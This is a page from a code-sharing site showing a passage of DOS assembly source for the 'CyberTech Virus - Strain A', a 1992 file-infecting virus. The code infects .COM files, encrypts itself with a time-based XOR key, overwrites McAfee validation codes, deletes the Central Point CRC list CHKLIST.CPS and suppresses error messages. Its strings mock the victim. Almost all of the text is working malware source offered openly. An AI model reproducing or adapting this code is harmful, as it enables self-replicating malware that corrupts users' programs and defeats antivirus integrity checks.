📄 cybertch.asm
字号:
Mov Ax,3d02h ; open file with read/write
Int 21h ; access
Mov Bx,5700h ; save file date/time stamp
Xchg Ax,Bx ; on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; read the first 4 bytes of
Lea Dx,OrgPrg[BP] ; the program onto OrgPrg
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file
Cmp Ax,'ZM' ;
Je ExeFile ;
Cmp Ax,'MZ' ; Check if renamed weird exe-
Je ExeFile ; file
Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected
Cmp Ah,'*' ;
Jne Infect ;
ExeFile: Call Close ; If one of the checks is yes,
Mov Ah,4fh ; close file and search next
Jmp Search ; file
FSeek: Xor Cx,Cx ; subroutine to jump to end
Xor Dx,Dx ; or begin of file
Int 21h ;
Ret ;
Infect: Mov Ax,4202h ; jump to EOF
Call FSeek ;
Cmp Ax,0f900 ; Check if file too large
Jae ExeFile ; if yes, goto exefile
Cmp Ax,10 ; Check if file too short
Jbe ExeFile ; if yes, goto exefile
Mov Cx,Dx ; calculate pointer to offset
Mov Dx,Ax ; EOF-52 (for McAfee validation
Sub Dx,52 ; codes)
Mov Si,Cx ; move file pointer to the
Mov Di,Dx ; calculated address
Mov Ax,4200h ;
Int 21h ;
Mov Ah,3fh ; read the last 52 bytes
Mov Dx,0fb00h ; of the file
Mov Cx,52 ;
Int 21h ;
Cmp Ds:0Fb00h,0fdf0h ; check if protected with the
Jne Check2 ; AG option
Cmp Ds:0fb02h,0aac5h ;
Jne Check2 ;
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Int 21h ; code
Jmp CalcVirus ;
Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the
Jne Eof ; AV option
Cmp Ds:0Fb02h+42,0aac5h ;
Jne Eof ;
Mov Ax,4200h ; yes - let virus overwrite
Mov Cx,Si ; the code with itself, so
Mov Dx,Di ; the file has no validation
Add Dx,42 ; code
Int 21h ;
Jmp CalcVirus ;
Eof: Mov Ax,4202h ; not AG or AV - jump to
Call Fseek ; EOF
CalcVirus: Sub Ax,3 ; calculate the jump for the
Mov Cs:CallPtr[BP]+1,Ax ; virus start
GetCrypt: Mov Ah,2ch ; get 100s seconds for the
Int 21h ; encryption value.
Cmp Dl,0 ; if not zero, goto NoZero
Jne NoZero ;
Mov Ah,9 ; If zero, display copyright
Lea Dx,Msg[Bp] ; message and generate again
Int 21h ; a number
Jmp GetCrypt ;
NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor
Lea Si,MainVir[BP] ; Move changed decryptor to
Mov Di,0fb00h ; a safe place in memory
Mov Cx,DecrLen ;
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus and merge
Mov Cx,CryptLen ; it to the changed decryptor
Encrypt: Lodsb ; code
Xor Al,Dl ;
Stosb ;
Loop Encrypt ;
Mov Ah,40h ; append virus at EOF or over
Lea Dx,0fb00h ; the validation code of
Mov Cx,VirLen ; McAfee
Int 21h ;
Mov Ax,4200h ; Jump to BOF
Call FSeek ;
Mov Ah,40h ; Write Jump at BOF
Lea Dx,CallPtr[BP] ;
Mov Cx,4 ;
Int 21h ;
Call Close ; Jump to Close routine
Ready: Mov Ah,1ah ; Restore DTA to normal
Mov Dx,80h ; offset
Int 21h ;
Mov Ax,Cs:OldInt24[Bp] ; remove critical error
Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the
Xor Bx,Bx ; original handler at the
Push Bx ; interrupt table
Pop Ds ;
Mov Ds:[4*24h],Dx ;
Mov Ds:[4*24h]+2,Ax ;
Push Cs ;
Pop Ds ;
Pop Ax ; restore possible error code
Mov Bx,100h ; nice way to jump to the
Push Cs ; begin of the original host
Push Bx ; code
Retf ;
Close: Pop Si ; why???
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Mov Ax,4301h ; restore file attributes
Pop Cx ;
Mov Dx,0fd1eh ;
Int 21h ;
Mov Ah,41h ; delete CHKLIST.CPS (the
Lea Dx,CpsName[BP] ; Central Point CRC list)
Int 21h ;
Push Si ; why???
Ret
;
; Message when we are in 1993
;
Removed Db 13,10,'The previous year you have been infected by a virus'
Db 13,10,'without knowing or removing it. To be gentle to you'
Db 13,10,'I decided to remove myself from your system. I suggest'
Db 13,10,'you better buy ViruScan of McAfee to ensure yourself'
Db 13,10,'complete security of your precious data. Next time you'
Db 13,10,'could be infected with a malevolent virus.'
Db 13,10,10,'May I say goodbye to you for now....',13,10
;
; Message when encryption byte = 0 or when we are living in 1993
;
Msg Db 13,10,'CyberTech Virus - Strain A'
Db 13,10,'(C) 1992 John Tardy of Trident'
Db 13,10,'$'
;
; New critical error handler
;
NewInt24: Mov Al,3 ; supress any critical error
Iret ; messages
CpsName Db 'chklist.cps',0 ; name for CP CRC-list
OldInt24 Dd 0 ; storage place for old int 24
CallPtr Db 0e9h,0,0 ; jump to place at BOF
FileSpec Db '*.COM',0 ; filespec and infection marker
OrgPrg: Int 20h ; original program
Db 'JT' ;
CryptLen Equ $-Crypt ; encrypted part length
VirLen Equ $-MainVir ; total virus length
; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -